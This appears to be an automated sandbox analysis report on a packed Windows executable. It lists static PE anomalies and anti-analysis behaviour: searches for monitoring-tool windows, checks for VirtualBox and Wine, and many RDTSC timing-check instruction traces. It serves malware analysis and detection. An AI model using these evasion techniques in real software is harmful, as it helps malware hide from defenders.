              Source: C:\Users\user\Desktop\random(2).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: random(2).exeStatic file information: File size 1822720 > 1048576
              Source: random(2).exeStatic PE information: Raw size of xyhrtgkn is bigger than: 0x100000 < 0x1aa400
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: random(2).exeStatic PE information: real checksum: 0x1bd743 should be: 0x1be5cf
              Source: random(2).exeStatic PE information: section name:
              Source: random(2).exeStatic PE information: section name: .idata
              Source: random(2).exeStatic PE information: section name:
              Source: random(2).exeStatic PE information: section name: xyhrtgkn
              Source: random(2).exeStatic PE information: section name: atwyfmcm
              Source: random(2).exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: random(2).exeStatic PE information: section name: entropy: 7.97802160630939
              Source: random(2).exeStatic PE information: section name: xyhrtgkn entropy: 7.955289387133198

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: RegmonclassJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\random(2).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 42D0F5 second address: 42D110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 42C9C5 second address: 42C9CF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F294453553Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AB975 second address: 5AB98E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29453582D6h 0x00000008 jmp 00007F29453582DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AA9B1 second address: 5AA9B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAC86 second address: 5AAC8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAC8A second address: 5AACBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535544h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2944535540h 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAF57 second address: 5AAF5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAF5B second address: 5AAF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAF67 second address: 5AAF7B instructions: 0x00000000 rdtsc 0x00000002 je 00007F29453582D6h 0x00000008 jmp 00007F29453582DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAF7B second address: 5AAFA1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F294453553Ah 0x00000008 jmp 00007F294453553Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007F294453553Ah 0x00000016 push eax 0x00000017 pop eax 0x00000018 push edi 0x00000019 pop edi 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AAFA1 second address: 5AAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DBh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jmp 00007F29453582E2h 0x00000010 jmp 00007F29453582E4h 0x00000015 pop ecx 0x00000016 js 00007F29453582DCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD8F0 second address: 5AD8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD8FA second address: 5AD909 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD909 second address: 5AD918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD918 second address: 5AD91E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD91E second address: 5AD922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD922 second address: 5AD932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD932 second address: 5AD93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2944535536h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD93F second address: 5AD994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F29453582E0h 0x0000000f push eax 0x00000010 jmp 00007F29453582E3h 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c js 00007F29453582ECh 0x00000022 jmp 00007F29453582E6h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD994 second address: 5AD998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5AD998 second address: 5AD99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB00 second address: 5ADB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB04 second address: 5ADB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB0A second address: 5ADB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB0F second address: 5ADB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d jp 00007F29453582DBh 0x00000013 push 00000000h 0x00000015 mov dx, si 0x00000018 push 867025AEh 0x0000001d pushad 0x0000001e jmp 00007F29453582E3h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB48 second address: 5ADB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADB4E second address: 5ADBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 798FDAD2h 0x0000000d or dword ptr [ebp+122D1964h], edx 0x00000013 jmp 00007F29453582E7h 0x00000018 push 00000003h 0x0000001a jc 00007F29453582DCh 0x00000020 xor esi, dword ptr [ebp+122D195Ch] 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D355Ah], eax 0x0000002e push 00000003h 0x00000030 mov edi, dword ptr [ebp+122D3892h] 0x00000036 push 970B4C30h 0x0000003b jo 00007F29453582E0h 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADC80 second address: 5ADC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADC84 second address: 5ADCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F29453582D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 xor edx, dword ptr [ebp+122D2116h] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d mov ecx, dword ptr [ebp+122D370Ah] 0x00000033 pop edi 0x00000034 call 00007F29453582D9h 0x00000039 jmp 00007F29453582E0h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jng 00007F29453582D8h 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADCE5 second address: 5ADD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push esi 0x00000010 jmp 00007F2944535548h 0x00000015 pop esi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADD16 second address: 5ADD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ADD1A second address: 5ADD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CE61E second address: 5CE62A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29453582D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CE7A0 second address: 5CE7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CE7A9 second address: 5CE7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CE931 second address: 5CE935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CEC0E second address: 5CEC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CEC12 second address: 5CEC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CEC16 second address: 5CEC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CEC22 second address: 5CEC27 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CED46 second address: 5CED4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CED4C second address: 5CED69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2944535545h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CED69 second address: 5CED8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 jng 00007F29453582D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F29453582D6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CED8E second address: 5CED92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF075 second address: 5CF079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF079 second address: 5CF0CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2944535546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2944535549h 0x00000017 jmp 00007F2944535541h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007F294453553Dh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF0CA second address: 5CF0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF418 second address: 5CF43B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2944535536h 0x00000008 jmp 00007F2944535549h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF43B second address: 5CF448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007F29453582D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF59E second address: 5CF5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F294453553Ch 0x00000010 ja 00007F2944535536h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF5BE second address: 5CF5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F29453582D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5CF5CA second address: 5CF5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D026C second address: 5D02B9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F29453582F4h 0x00000012 jne 00007F29453582D6h 0x00000018 jmp 00007F29453582E8h 0x0000001d jno 00007F29453582EDh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D3149 second address: 5D314D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D314D second address: 5D3159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D3159 second address: 5D3163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D3163 second address: 5D3179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D3179 second address: 5D3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D489C second address: 5D48D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F29453582E7h 0x00000011 popad 0x00000012 jmp 00007F29453582E2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D48D2 second address: 5D48DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D48DA second address: 5D48E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D8289 second address: 5D828D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D828D second address: 5D82A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29453582E1h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D82A6 second address: 5D82AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D71E5 second address: 5D71EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D9D11 second address: 5D9D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D9D17 second address: 5D9D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5D9D1B second address: 5D9D32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F294453553Ch 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF6AE second address: 5DF6B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF6B4 second address: 5DF6B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF6B9 second address: 5DF6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DEh 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF6D4 second address: 5DF6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2944535536h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F2944535536h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5A608B second address: 5A6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F29453582D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5A6098 second address: 5A60A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F2944535536h 0x0000000c rdtsc
